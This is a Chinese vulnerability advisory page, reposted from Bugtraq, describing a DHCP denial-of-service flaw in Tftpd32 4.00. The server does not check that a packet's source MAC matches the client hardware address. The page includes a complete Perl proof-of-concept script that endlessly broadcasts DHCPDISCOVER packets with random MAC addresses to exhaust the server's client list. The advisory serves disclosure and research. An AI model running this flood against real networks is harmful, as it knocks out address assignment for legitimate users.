Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Tftpd32 DHCP解析器报文拒绝服务漏洞

发布日期:2012-05-21
更新日期:2012-05-23受影响系统:
TFTPD32 TFTPD32 4.00
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 53649Tftpd32是Windows平台上的tftp和dhcp服务器。tftpd32 4.00的DHCP服务器没有识别DHCP发现数据包的真实资源MAC地址是否与客户端硬件地址相同,攻击者通过向DHCP服务器的客户端列表填塞恶意DHCP发现数据包,导致无法获取DHCP服务器的IP地址,造成拒绝服务。<*来源:vendor
 
  链接:http://www.securityfocus.com/archive/1/522824
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!vendor ()提供了如下测试方法:#!/usr/bin/perl
use IO::Socket::INET;
use Net::DHCP::Packet;
use Net::DHCP::Constants;
$a=1;
while(1){
    print "Request Number : $a ";        $mac=int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).
    int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9));        $socket = IO::Socket::INET->new( Proto => "udp",
        Broadcast => 1,
        LocalPort => 68,
        PeerAddr =>"255.255.255.255",
        PeerPort => 67,
        ) || die "Unable to create socket: $@ ";        $discover = Net::DHCP::Packet->new(
        xid => int rand(0xFFFFFFFF),
        Chaddr => $mac,
        DHO_DHCP_MESSAGE_TYPE() => DHCPDISCOVER(),
        DHO_VENDOR_CLASS_IDENTIFIER() => "MyVendorClassID",
        DHO_DHCP_PARAMETER_REQUEST_LIST() => "1 2 6 12 15 28 67");        $discover->addOptionRaw( 61, pack("H*",$mac));        print "Sending DISCOVER to 255.255.255.255:67 ";        $socket->send( $discover->serialize() ) or die "Unable to send Discover:$! ";        $socket->close();        sleep(3);        $a++;
}
exit(1);建议:
--------------------------------------------------------------------------------
厂商补丁:TFTPD32
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://tftpd32.jounin.netSymantec Endpoint Protection文件包含漏洞(CVE-2012-0295)IBM Rational Change跨站脚本执行漏洞相关资讯      拒绝服务漏洞 
  • 数字签名拒绝服务漏洞(CVE-2013-  (11/13/2013 12:25:03)
  • Intel 82574L Gigabit Ethernet   (03/01/2013 21:09:03)
  • Wireshark DTN Dissector 拒绝服务  (02/03/2013 10:37:43)
  • Rockwell Automation FactoryTalk   (04/10/2013 09:08:12)
  • IBM WebSphere Message Broker多个  (03/01/2013 21:04:45)
  • HP XP P9000 Command View   (02/03/2013 10:36:32)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图